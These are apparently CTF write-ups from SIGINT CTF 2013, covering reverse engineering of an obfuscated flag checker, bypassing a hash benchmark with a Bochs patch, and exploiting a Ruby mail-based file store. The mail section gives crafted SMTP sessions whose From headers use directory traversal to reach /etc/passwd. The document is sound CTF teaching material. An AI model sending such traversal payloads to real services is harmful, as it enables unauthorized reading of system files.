Monday, July 22, 2013

SIGINT CTF 2013: Task fenster (400 pts)



In this task we have a binary, fenster.exe (link to original exe: click), which checks whether the given text is the flag we are looking for. The executable is obfuscated and contains some anti-debugging tricks. The first step is to remove all the garbage and produce a clean exe.
So, let's start!

The first debug check is inside TLS callback at 0x4019CB. All it does is:
encrypt(check_for_debugger, 0x1B, 0xEC, 0x00409CD8);
bool debugger = check_for_debugger();
encrypt(check_for_debugger, 0x1B, 0xEC, 0x00409CD8);
if (debugger) {
   exit(0);
}
encrypt(void* data, int size, int key, int* some_data) is a lengthy function (address: 0x40194B) responsible for data encryption / decryption, but its exact implementation is not relevant to us. As you can see, we can just remove this TLS callback entry from the executable without any consequence later on.

If we enter the check_for_debugger routine, we can see three further anti-debugging techniques:
push ss
pop ss
This is quite tricky. Any modification of the ss register (excluding the lss instruction) causes interrupts to be delayed until the end of execution of the next instruction. So, if we step through this code using a debugger (step into/over), the code will "escape" the single-stepping mode immediately after one steps into/over "pop ss". We can safely nop these instructions out.
pushfd
pop eax
This was probably inserted only to fool automatic analyzers and decompilers such as Hex-Rays. We can also nop it out.
call <jmp.&KERNEL32.IsDebuggerPresent>
Standard anti-debugging check, we can replace it with "xor eax,eax" or anything else. Those anti-debugs would often show up inside other functions, so watch out while stepping through the executable. ;)

The main function is located at 0x401EF9. It loads user input from stdin and then does the following with different dataA and dataB pointers in seven iterations (anti-debugging code is skipped, check is a function at 0x00401ab5):
encrypt(check, 0x24, KEY, SOME_PTR);
input_ok &= check(dataA, dataB, user_input);
encrypt(check, 0x24, KEY, SOME_PTR);
To make further analysis easier, we should dump the decrypted check function (and all sub-functions, which are encrypted too) and get rid of all calls to encrypt(). Once this is done, we are ready to dive into the check code and switch from OllyDbg to IDA.

After a brief analysis, it is clear that the function passes our input through finite-state machines (compiled regular expressions). The first subfunction at 0x401C44 performs some kind of initialization, the second one at 0x401C9D executes the machine and the last one at 0x401AD9 checks if the machine completed in a final state. The two pointers passed to check are:
  • int*** dataA - machine specification, dataA[state][letter] is a NULL-terminated list of states that we can reach from the given state after a specific letter. Note that states are numbered from 1 to 255 and dataA[0] refers to the first state. Only capital letters cause transitions. Index=0 corresponds to 'A' and index 25 to 'Z'.
  • int* dataB - a null-terminated list of final state indexes
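To make the two structures concrete, here is a minimal Python sketch of how such a nondeterministic machine can be simulated. The toy machine is hypothetical (it is not dumped from fenster.exe), the nested dictionaries merely stand in for dataA and dataB, and starting in state 1 is an assumption based on the numbering described above.

```python
import string

def accepts(transitions, finals, text, start=1):
    """Simulate a nondeterministic state machine on text.

    transitions[state][letter] is a list of successor states (stand-in for dataA),
    finals is a list of accepting states (stand-in for dataB).
    """
    current = {start}
    for letter in text:
        following = set()
        for state in current:
            following.update(transitions.get(state, {}).get(letter, []))
        current = following
        if not current:
            # No live state left, e.g. after a non-capital letter.
            return False
    return bool(current & set(finals))

# Hypothetical toy machine: accepts capital-letter strings ending with "EN".
TOY = {1: {letter: [1] for letter in string.ascii_uppercase}, 2: {"N": [3]}}
TOY[1]["E"] = [1, 2]
TOY_FINALS = [3]

print(accepts(TOY, TOY_FINALS, "SWEN"))  # True
print(accepts(TOY, TOY_FINALS, "ENE"))   # False
```

Tracking a set of live states instead of a single one is what allows several successors per (state, letter) pair, which is exactly what the NULL-terminated lists encode.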
Once we know the meaning of those structures, we can write some visualization and crack the regular expressions. I wrote a small C++ program which reads data from the "fenster" process, generates a graph description for dot and then compiles it to svg. The results are shown below (rectangles = final states, * = all capital letters, ^XY = all capitals without X and Y):

machine0.svg:

machine1.svg: 

machine2.svg: 

machine3.svg: 

machine4.svg: 

machine5.svg: 

machine6.svg: 

Solving them by hand would be painful (look at machine4.svg!), so the next step was to write an optimized brute-force solver. Analyzing the machines shows that:
  • machine0 - input must end with "EN" and the second letter is "E"
  • machine1 - input is a concatenation of pairs: {"NW", "EN", "ES", "CH", "SW", "RG", "GS", "SE", "RE", "GE", "NE"}
  • machine3 - input length is 16
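The three observations above already pin down the shape of every candidate. The following Python sketch (not the solver we used, just an illustration of the search space; the helper names are made up for this example) enumerates that shape and counts the candidates.

```python
from itertools import product

PAIRS = ["NW", "EN", "ES", "CH", "SW", "RG", "GS", "SE", "RE", "GE", "NE"]

def first_pairs():
    # machine0: the second letter of the input must be "E".
    return [pair for pair in PAIRS if pair[1] == "E"]

def candidates():
    # 8 pairs in total (length 16): constrained head, 6 free pairs, fixed "EN" tail.
    for head in first_pairs():
        for middle in product(PAIRS, repeat=6):
            yield head + "".join(middle) + "EN"

def fits_constraints(text):
    chunks = [text[i:i + 2] for i in range(0, len(text), 2)]
    return (len(text) == 16 and text[1] == "E" and text.endswith("EN")
            and all(chunk in PAIRS for chunk in chunks))

total = len(first_pairs()) * len(PAIRS) ** 6
print(first_pairs())  # ['SE', 'RE', 'GE', 'NE']
print(total)          # 7086244
```

Only four pairs end in "E", so the first position has 4 choices, the last one is fixed, and the remaining six positions have 11 choices each.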
With the above knowledge, we only have to check around 4*11^6 different inputs. The simplest way for me to check if the input was correct was to just reuse the original check function from fenster.exe loaded as a DLL. The solver's code was as follows:
#include <cstring>
#include <cstdio>
#include <Windows.h>
#include <cassert>

using namespace std;

int machines[7] =   { 0x4077A0, 0x407E40, 0x4082E0, 0x408BA0, 0x4098C0, 0x409B48, 0x409C68 };
int end_states[7] = { 0x4077DC, 0x407E70, 0x408300, 0x408BE4, 0x409920, 0x409B58, 0x409C70 };
const int pairscnt = 11;
char* pairs[pairscnt] = {"NW", "EN", "ES", "CH", "SW", "RG", "GS", "SE", "RE", "GE", "NE"};
char key[17] = " E            EN";
int it[7] = {7};
int regex_match, memset_addr;

__declspec(naked) bool __cdecl check()
{
    __asm
    {
        push edi
        push ebp
        mov ebp, esp
        and esp, 0xFFFFFFF0

        mov edi, 0

        looop:
            sub esp,4
            push offset key
            push end_states[edi*4]
            push machines[edi*4]
            call regex_match
            add esp, 0x10
            test eax,eax
            jz hop

            inc edi
            cmp edi, 7
        jnz looop

hop:
        mov esp, ebp
        pop ebp
        pop edi
        retn
    }
}

int main()
{
    int fenster = (int)LoadLibraryA("~fenster2.dll");

    // It doesn't work on bases different from 0x400000,
    // because the binary has no relocations (e.g. final states list pointers)
    // just run it until it works
    assert(fenster == 0x400000);
    regex_match = 0x401d97;
    memset_addr = 0x40C17C;

    // Resolving imports
    *(int*)memset_addr = (int)memset;

    // Assert that last pair is set
    assert(strlen(key) == 16);

    while(it[6] < pairscnt)
    {
        for(int i=0; i<7; i++)
           key[i*2] = pairs[it[i]][0],
           key[i*2+1] = pairs[it[i]][1];
 
        if(check())
            puts(key);
 
        it[0]++;
        for(int i=0; i<6 && it[i]==pairscnt; i++)
            it[i+1]++,
            it[i] = 0;
    }
    return 0;
}
where ~fenster2.dll is a deobfuscated executable, you can download it here: https://docs.google.com/file/d/0B-L9DIAuaV7STkNjNGdBY1RnQ2M/edit?usp=sharing. After running the application for a short while, it spit out the "REGENECHENSESWEN" textual string, which indeed turned out to be the correct flag. +400pts :)

Friday, July 12, 2013

SIGINT CTF 2013: Task 0x90 (300 pts)

The "0x90" task was found in the "reversing" category and was only solved by three teams in the end. The task archive contained two files:

j00ru@xxx:~/sigint/0x90$ ls 
0x90.run xor.bin 

The "xor.bin" file was eight bytes long and contained uninteresting binary data, while "0x90.run" turned out to be a 64-bit statically compiled ELF file of significant size:

j00ru@xxx:~/sigint/0x90$ file 0x90.run
0x90.run: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, not stripped
j00ru@xxx:~/sigint/0x90$ du -hs 0x90.run
3.0M    0x90.run


Starting the program on an older machine throws the following error message:

Fatal Error: This program was not built to run on the processor in your system.
The allowed processors are: Intel(R) processors with SSE4.2 and POPCNT instructions support.


Interesting! Repeating the same action on a more recent hardware configuration doesn't seem to yield any evident results - the application successfully starts and extensively consumes CPU resources (using trigonometric functions), but nothing much happens on stdout:

(gdb) r
Starting program: /home/mjurczyk/Downloads/sigint/0x90/0x90.run 
^C
Program received signal SIGINT, Interrupt.
0x000000000040399f in atan.L ()
(gdb)

Lacking ways to interact with a running process, we decided to do some actual reverse engineering at this point. If you load the file up in IDA and take a brief look at the entry point, it is clearly visible that the executable was built with the Intel C++ Compiler (ICC):


Following a cursory analysis, we were able to establish the logic of the challenge and its actual goal. Long story short, the program stores a 64-bit hash throughout its entire lifetime, gradually forming its final value in the following manner:
hash = 0xC23F3048EA749B76
if (ptrace(PTRACE_TRACEME) fails) {
  hash++
}
hash = merge_hashes(hash, calculate_hash(strip(argv[0]), strlen(strip(argv[0]))))
for (int i = 0; i < 1000; i++) {
  benchmark()
  hash = merge_hashes(hash, calculate_hash(image_base, image_size))
  hash += open64("/proc/self/status")
}
hash ^= xor.bin file contents

The program would then print out "sigint_" followed by the binary hash value cast to a textual form (i.e. each byte of the hash should be printable at this point, if it is valid). The exact implementations of the "merge_hashes" and "calculate_hash" functions are not relevant at this point; it is only important to note that the first one reduces two 64-bit values into a single one using binary and arithmetic operations, whereas the second one calculates a 64-bit hash value given an input memory area.

In theory, obtaining the flag should be as easy as launching the executable and observing stdout. What makes it an actual challenge is the presence of the benchmark function, which further invokes one of two subroutines, depending on the CPU capabilities: benchmark_kerneldi_W and benchmark_kerneldi_A. In essence, each function was programmed to perform 10.000.000.000.000 (ten trillion) iterations of expensive SSE4.2 operations - something that would never realistically complete within the time frame of the CTF, which is where the problems begin.

There are several important conclusions we can draw here:
  1. we would like the program to complete in reasonable time, i.e. get rid of the time consuming benchmark loop.
  2. we would like the final hash to be equal to one which would be generated with the loop in place, which indicates that:
    1. the authors most likely expect us to use the original filename for the file, we should not change it.
    2. we should be careful when attaching a debugger to the program, because doing so might affect the output.
    3. also attaching a remote debugger past the ptrace() call is not possible.
    4. the program should use non-modified memory for hash computation, if we decide to make any alterations to its executable code.
    5. all calls to functions which make use of global variables (e.g. srand) are crucial and cannot be omitted.
    6. file descriptors returned by open64 should be identical to ones returned normally (relevant to gdb, which creates additional descriptors in the target process and thus affects open64 return values).
 Considering the volume of requirements above, it is fairly troublesome to patch the program in a way that emulates the normal execution environment, but still removes the lengthy loop. While it is surely possible to develop such a patch, it is by no means elegant. The perfect solution would be to either:
  • obtain the correct return values of the "calculate_hash" function for argv[0] and program memory during each iteration, and create our own implementation of the final hash calculation, or ...
  • ... remove the loop in a way that does not require modifying the code of the loop itself, i.e. on CPU level.
Note that while changing the semantics of an instruction would typically require an x86 hardware debugger or ability to apply arbitrary microcode updates, there is a much easier way - you could use a CPU emulator, such as Bochs!

As both Gynvael and I had some prior experience with writing Bochs instrumentation (see here and here), I was happy to implement the idea. The next few minutes of development resulted in the creation of the following short code snippet:

#include <stdint.h>
#include <stdarg.h>
#include <time.h>

#include "bochs.h"
#include "cpu/cpu.h"
#include "cpu/instr.h"

#include "instrument.h"

#ifndef RAX
# define RAX pcpu->gen_reg[BX_64BIT_REG_RAX].rrx
#endif  // RAX

#ifndef RBX
# define RBX pcpu->gen_reg[BX_64BIT_REG_RBX].rrx
#endif  // RBX

#ifndef RIP
# define RIP pcpu->prev_rip
#endif  // RIP

void bx_instr_before_execution(unsigned cpu, bxInstruction_c *i) {
  static unsigned int adjustements = 0;

  BX_CPU_C *pcpu = BX_CPU(cpu);
  if (!pcpu->protected_mode()) {
    return;
  }

  if (RAX == 10000000000000LL) {
    RAX = 2;
    fprintf(stderr, "[sigint_0x90] {%u} Special RAX found and adjusted at RIP=%llx, %u\n",
            time(NULL), RIP, ++adjustements);
    fflush(stderr);
  } else if (RIP == 0x402669 && (RBX & 0xffffffff00000000LL)) {
    fprintf(stderr, "[sigint_0x90] {%u} Hash value: %llx\n", time(NULL), RBX);
    fflush(stderr);
  } else if (RIP == 0x4026e9 && RAX == RBX && RAX < 0x10000) {
    fprintf(stderr, "[sigint_0x90] {%u} open64() fd: %llx\n", time(NULL), RAX);
    fflush(stderr);
  }
}

The code would serve three different purposes - nullifying the benchmark loop and displaying information about the static image hash value and open64 syscall return value for each of 1000 external loop iterations. After building Bochs, booting up an Ubuntu 13.04 Server 64-bit guest (we happened to have a Bochs hdd image handy due to unrelated bochspwn project activity) and starting the 0x90.run executable, we could observe the following emulator console output:
While the executable in the guest system was running at around one iteration of the external loop per second, I reverse engineered the merge_hashes, calculate_hash and final hash generation code and rewrote it in C++. Once I found that the static image hash is 0x79082a819dc08d7f for every loop iteration (i.e. no static memory of the program changes between iterations) and that the open64 numeric file descriptor values start at 4 and increment by one, I ended up with the following implementation:
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <stdint.h>
using namespace std;

uint64_t hash_region(const char *data, uint32_t length) {
  uint64_t h = 0;
  for (uint32_t i = 0; i < length; i++) {
    h = (h << 6) + (h << 16) - h + data[i];
  }
  return h;
}

uint64_t merge_hashes(uint64_t h, uint64_t g) {
  return ((g << 16) - g + (h << 8) + h);
}

int main() {
  const uint64_t kChallengeImageHash = 0x79082a819dc08d7f;
  const uint64_t kXorConstant = 0x6704b2e715d8d012;
  const char filename[] = "/0x90.run";

  // Initial value from: 
  //   mov     rbx, 0C23F3048EA749B76h
  uint64_t hash = 0xC23F3048EA749B76LL;

  // increment for failed ptrace(PTRACE_TRACEME); debugged process.
  // hash++;

  hash = merge_hashes(hash, hash_region(filename, strlen(filename)));

  // 1000 is a constant number of iterations:
  //   cmp     r14, 1000
  //   jb      loc_402546
  unsigned int open64_fd = 4;
  for (unsigned int i = 0; i < 1000; i++, open64_fd++) {
    hash = merge_hashes(hash, kChallengeImageHash) + open64_fd;
  }

  // Final stage: xor with the contents of xor.bin.
  hash ^= kXorConstant;

  // Display solution.
  uint8_t hash_string[12];
  memcpy(hash_string, &hash, sizeof(uint64_t));
  hash_string[8] = '\0';
  printf("hash(\"%s\") = %llx, sigint_%s\n", filename, hash, hash_string);

  return 0;
}

The output of the above code was as follows:

hash("/0x90.run") = 52336d6d6148636d, sigint_mcHamm3R
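The flag text is simply the eight bytes of the final hash read in memory order, which is little-endian on x86-64 (this mirrors the memcpy in the C++ code). A short Python sketch to double-check the conversion, with a helper name made up for this example:

```python
import struct

def hash_to_flag(value):
    # Pack the 64-bit hash as it lies in memory on a little-endian machine.
    raw = struct.pack("<Q", value)
    return "sigint_" + raw.decode("ascii")

print(hash_to_flag(0x52336d6d6148636d))  # sigint_mcHamm3R
```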

As you can imagine, "sigint_mcHamm3R" turned out to be the correct flag. +300 points. :) While writing a C++ program turned out to be faster than waiting for 0x90.run to complete in Bochs, you could just as well wait for around 30 minutes and grab the flag directly from the program's standard output:


Monday, July 8, 2013

SIGINT CTF 2013: Task mail (100 pts)

Task description:
Date: Sun, 30 Jun 2013 13:37:00 +0200
From: sales@cloud.cloud
To: hans@ck.er
message-id: c524e67c59dfd30c511baeda8197fc9a@cloud.cloud
Subject: Re: Evaluation of your B2B Storage Cloud Solution
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="--==_mimepart_51d5c59b14bda_1fbbba2fe89623d";
charset=UTF-8
Content-Transfer-Encoding: 7bit

----==_mimepart_51d5c59b14bda_1fbbba2fe89623d
Mime-Version: 1.0
Content-Type: text/plain;
charset=UTF-8
Content-Transfer-Encoding: 7bit

Dear Customer,

I am glad you are considering our Cloud for your large scale needs. In
response to your desire to evaluate the security of our cloud, I have
attached all relevant sourcecode to this mail. Our trained technicians
ensured me, of it beeing only best quality software. You will not be
disapointed. We have also set up a test deployment especially for you,
you may access it through test@b3.ctf.sigint.ccc.de.

We have invested quite a lot of money to be able to deliver you such
cloud service. As you may already know most insecure cloud offerings
are based the HTTP protocol. We have identified e-mail, which is the
backbone of modern business, as the optimal approach to deliver you
a secure and reliable cloud.

Looking forward to our business relationship.

Best regards from your
cloud.cloud sales represantitive

----==_mimepart_51d5c59b14bda_1fbbba2fe89623d
Mime-Version: 1.0
Content-Type: application/x-bzip2;
charset=UTF-8;
filename=source.tar.bz2
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=source.tar.bz2

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

----==_mimepart_51d5c59b14bda_1fbbba2fe89623d--
So as you can see, along with the message about new cloud software we also received
an attachment, which could be easily decoded using python: 
>>> from base64 import b64decode
>>> with open("encoded.txt", "r") as file: content = file.read().replace("\n", "")
...
>>> with open("source.tar.bz2", "wb") as file: file.write(b64decode(content))
... 
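For reference, decoding and listing the archive can also be done in one go without touching the disk. The sketch below is written for Python 3 and uses only the standard library; since the mail itself is not embedded here, it builds a tiny stand-in archive (the helper make_demo_attachment and its payload are purely illustrative) to demonstrate the round trip.

```python
import base64
import io
import tarfile

def list_attachment(b64_text):
    """Decode a base64 tar.bz2 attachment and return the member names."""
    raw = base64.b64decode(b64_text)  # line breaks in the input are ignored
    with tarfile.open(fileobj=io.BytesIO(raw), mode="r:bz2") as archive:
        return archive.getnames()

def make_demo_attachment():
    """Build a small stand-in archive so the sketch runs without the mail."""
    payload = b"puts 'demo'\n"
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w:bz2") as archive:
        info = tarfile.TarInfo("handler.rb")
        info.size = len(payload)
        archive.addfile(info, io.BytesIO(payload))
    return base64.encodebytes(buffer.getvalue()).decode("ascii")

print(list_attachment(make_demo_attachment()))  # ['handler.rb']
```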
After unpacking the archive, we ended up with handler.rb, the source of a file storage system based on SMTP:
#!/usr/bin/ruby

require "pathname"
Dir.chdir(Pathname.new(__FILE__).dirname.to_s)

require "mail"

mail_size_limit= 16*1024
user_size_limit= 1024**2
users_dir= Pathname.new("user")

raw_incoming_mail= STDIN.read(mail_size_limit)
incoming_mail= Mail.new(raw_incoming_mail)

user= [incoming_mail.from].flatten[0].gsub('"', "")
exit 1 unless user
exit 1 unless user=~ /@/
subject= incoming_mail.subject
exit 1 unless subject
user_dir= users_dir + user.split("@", 2).reverse.join("___")
size_file= user_dir + ".size"
tmp_size_file= user_dir + ".size_tmp"

def send_response(original_mail, response_string, attachment= nil, response_subject=nil)
 Mail.deliver do |mail|
  to original_mail.from
  from original_mail.to
  subject response_subject || "Re: #{original_mail.subject}"
  add_file attachment if attachment
  body <<EOF
#{response_string}

--------
available commands:
signup
list
put
get <filename>
delete <filename>
share <filename> <user>
EOF
 end
end

def send_error(original_mail, error_string)
 Mail.deliver do |mail|
  to original_mail.from
  from original_mail.to
  subject "error Re: #{original_mail.subject}"
  body <<EOF
I am sorry to inform you, that your requested command could not be executed.
The reason is:

#{error_string}
EOF
 end
end

case subject
when "signup"
 if user_dir.directory?
  send_error(incoming_mail, "your are already signed up")
  exit
 end
 unless (user_dir+"../.signup_allowed").file?
  send_error(incoming_mail, "signup is currently disabled")
  exit
 end
 user_dir.mkdir
 size_file.open("w") { |f| f.puts 0 }
 send_response(incoming_mail, "signup successfull")
when "list"
 unless user_dir.directory?
  send_error(incoming_mail, "you are not signed up")
  exit
 end
 file_listing= "your_files:\n" +
 user_dir.children.select do |file|
  file.basename.to_s[0] != ?.
 end.collect do |file|
  "#{file.basename} #{file.size/1024.0}Kb"
 end.join("\n")
 send_response(incoming_mail, file_listing)
when /\Aget ([A-Za-z0-9_-]+(\.[a-z0-9]+)?)\Z/
 file_name= $1
 file_path= user_dir+file_name
 unless user_dir.directory?
  send_error(incoming_mail, "you are not signed up")
  exit
 end
 unless file_path.file?
  send_error(incoming_mail, "the requested file does not exist")
  exit
 end
 send_response(incoming_mail, "here is your requested file", file_path.to_s)
when /\Ashare ([A-Za-z0-9_-]+(\.[a-z0-9]+)?) ([A-Za-z0-9][A-Za-z0-9._-]*@([A-Za-z0-9-]+\.)+[A-Za-z]+)\Z/
 file_name= $1
 second_user= $3
 file_path= user_dir+file_name
 unless user_dir.directory?
  send_error(incoming_mail, "you are not signed up")
  exit
 end
 unless file_path.file?
  send_error(incoming_mail, "the requested file does not exist")
  exit
 end
 second_user_dir= users_dir + second_user.split("@", 2).reverse.join("___")
 second_size_file= second_user_dir + ".size"
 second_file_path= second_user_dir + file_name
 unless second_size_file.file?
  send_error(incoming_mail, "the given user is not signed up")
  exit
 end
 if second_file_path.exist?
  send_error(incoming_mail, "file cannot be shared for unknown reasons")
  exit
 end
 second_file_path.make_symlink(file_path.to_s.sub("user/", "../"))
 send_response(incoming_mail, "file shared", file_path.to_s)
when /\Adelete ([A-Za-z0-9_-]+(\.[a-z0-9]+)?)\Z/
 file_name= $1
 file_path= user_dir+file_name
 user_size= begin
  size_file.read.to_i
 rescue Errno::ENOENT
  send_error(incoming_mail, "you are not signed up")
  exit
 end
 unless file_name[0] != ?. and file_path.file?
  send_error(incoming_mail, "the requested file does not exist")
  exit
 end
 user_size-= file_path.size
 file_path.unlink
 tmp_size_file.open("w") { |f| f.puts user_size }
 tmp_size_file.rename(size_file)
 send_response(incoming_mail, "file deleted")
when "put"
 user_size= begin
  size_file.read.to_i
 rescue Errno::ENOENT
  send_error(incoming_mail, "you are not signed up")
  exit
 end
 attachment= incoming_mail.attachments[0]
 unless attachment and attachment.filename=~ /\A([A-Za-z0-9_-]+(\.[a-z0-9]+)?)\Z/
  send_error(incoming_mail, "no valid attachment found")
  exit
 end
 file_path= user_dir+attachment.filename
 if file_path.exist?
  send_error(incoming_mail, "file already exists")
  exit
 end
 attachement_body= attachment.body.decoded
 user_size+= attachement_body.size
 if user_size > user_size_limit
  send_error(incoming_mail, "you have no space left")
  exit
 end
 tmp_size_file.open("w") { |f| f.puts user_size }
 tmp_size_file.rename(size_file)
 file_path.open("w") { |f| f.write attachement_body }
 send_response(incoming_mail, "file saved")
end
After a quick code analysis we noticed that there was a directory traversal vulnerability in the "From" header ("user" variable) and its only requirement was to have a '@' character somewhere within the string. In order to exploit the flaw, we could send the following message to test@b3.ctf.sigint.ccc.de:

HELO vnd.name
MAIL FROM: <vnd@vnd.name>
DATA
From: vnd/../@vnd.name
Subject: list
.
QUIT
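To see why such a "From" value works, the user_dir computation from handler.rb can be mirrored in a few lines of Python. This is only an approximation: posixpath.normpath is used here as a stand-in for the lexical ".." handling of Ruby's Pathname#+, which is an assumption of this sketch, and the function name is made up.

```python
import posixpath

def user_dir(from_header, users_dir="user"):
    user = from_header.replace('"', "")
    parts = user.split("@", 1)            # Ruby: user.split("@", 2)
    name = "___".join(reversed(parts))    # Ruby: .reverse.join("___")
    # Stand-in for Pathname#+, which resolves ".." components lexically.
    return posixpath.normpath(posixpath.join(users_dir, name))

print(user_dir("alice@example.com"))              # user/example.com___alice
print(user_dir("vnd/../@vnd.name"))               # user
print(user_dir("vnd/../../../../etc/@vnd.name"))  # ../../etc
```

With the second header the computed directory collapses to the users directory itself, so the "list" command enumerates every registered account instead of one user's files.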

However, because the return message containing a listing was sent back to the address specified in the "From" header, and e-mail addresses containing a '/' character are usually considered invalid, we needed to either patch an existing SMTP server or, what seemed to be a better option, write a very basic one from scratch using handy libraries. Furthermore, some DNS changes of MX records were required to redirect e-mail traffic to our box. The source code of a trivial SMTP server is as follows:
from datetime import datetime
import asyncore
from smtpd import SMTPServer

class RemoteServer(SMTPServer):
   no = 0
   def process_message(self, peer, mailfrom, rcpttos, data):
       filename = '%05d-%s.txt' % (self.no, datetime.now().strftime('%Y%m%d%H%M%S'))
       self.no += 1
       f = open(filename, 'w')
       f.write("%s\n%s\n%s\n" % (str(peer), str(mailfrom), str(rcpttos)))
       f.write(data)
       f.close()
       print '%s saved.' % filename

def run():
   foo = RemoteServer(('0.0.0.0', 25), ('0.0.0.0', 25))
   try:
       asyncore.loop()
   except KeyboardInterrupt:
       pass

if __name__ == '__main__':
  run()

By using the above code, we could finally receive the list of registered users. As the flag was found in the /etc/passwd file (it took a while to guess that), we fetched it using the "get" method of the storage system.

HELO somehost
MAIL FROM: <vnd@vnd.name>
DATA
From: vnd/../../../../etc/@vnd.name
Subject: get passwd
.
QUIT

The file was sent in the attachment format, so we needed to unpack it again. The original contents of the file were as shown below:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
challenge:x:1000:1000:SIGINT_do_not_trust_mail_addresses_17808d2cf719541b:/home/challenge:/bin/bash
postfix:x:106:114::/var/spool/postfix:/bin/false

The "SIGINT_do_not_trust_mail_addresses_17808d2cf719541b" flag visibly stood out in the file. It worked right away, +100pts. :)

SIGINT CTF 2013: Task bloat (200 pts)



The "source code" was basically 45 MB of Drupal code with several additional themes installed.
The idea to solve the task was plain and simple (though the execution was a little bit tricky):
